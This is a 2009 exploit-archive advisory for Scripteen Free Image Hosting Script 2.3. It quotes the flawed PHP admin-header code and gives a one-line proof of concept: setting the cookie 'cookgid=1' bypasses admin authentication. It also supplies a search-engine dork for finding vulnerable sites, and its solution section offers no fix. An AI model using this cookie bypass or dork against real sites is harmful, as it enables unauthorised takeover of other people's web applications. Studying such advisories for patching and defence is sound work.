[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Scripteen Free Image Hosting Script 2.3 Insecure Cookie Handling Vuln
# Published : 2009-07-24
# Author : Qabandi
# Previous Title : Clip Bucket <= 1.7.1 Insecure Cookie Handling Vulnerability
# Next Title : Pixaria Gallery 2.3.5 (file) Remote File Disclosure Exploit
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_\_,
( : / (_) / ( .
___________________
_/QQQQQQQQQQQQQQQQQQQ__
__/QQQ/````````````````QQQ___
_/QQQQQ/ QQQQQQ
/QQQQ/`` ```QQQQ
/QQQQ/ QQQQ
|QQQQ/ By Qabandi QQQQ|
|QQQQ| |QQQQ|
|QQQQ| From Kuwait, PEACE... |QQQQ|
|QQQQ| |QQQQ|
|QQQQ iqa[a]hotmail.fr /QQQQ|
QQQQ __ /QQQQ/
QQQQ /QQ_QQQQ/
QQQQ QQQQQQQ/
QQQQQ /QQQQQ/_
``QQQQQ_____________/QQQ/QQQQ_
``QQQQQQQQQQQQQQQQQQQ/ `QQQQ
``````````````````` `````
=Vuln: Scripteen Free Image Hosting Script V2.3 Insecure Cookie Handling
=INFO: http://www.scripteen.com/
=BUY: ---
=Download: http://www.scripteen.com/forum/news-announcements-f2-scripteen-free-image-hosting-script-v2-3-t631.html
=DORK: DORK:"Powered by Scripteen Free Image Hosting Script V 2.3"
____________
_-=/:Conditions:=-_
````````````````````````````````````````````````````````````````````````````````
none
---------------------------------------===--------------------------------------
_________________
_-=/:Vulnerable_Code:=-_
````````````````````````````````````````````````````````````````````````````````
// in ".adminheader.php"
$userid=$_SESSION['userid'];
$usergid=$_SESSION['usergid'];
if (!$userid || empty($userid) || $userid==""){
$userid = $_COOKIE['cookid'];
$usergid = $_COOKIE['cookgid'];
}
// this is the scripts authentication code, pasted in all admin files.. fail.
if($usergid!="1")
{
header("Location: logout.php"); exit;
}
---------------------------------------===--------------------------------------
_______
_-=/:P.o.C:=-_
````````````````````````````````````````````````````````````````````````````````
Set:
Cookie: cookgid=1
---------------------------------------===--------------------------------------
__________
_-=/:SOLUTION:=-_
````````````````````````````````````````````````````````````````````````````````
nah
---------------------------------------===--------------------------------------
______________________________________________________________________________
/
| ---------------------------------------------------------------------- |
______________________________________________________________________________/
No More Private /
`````````````````
Salamz to All Muslim Hackers.
# www.Syue.com [2009-07-24]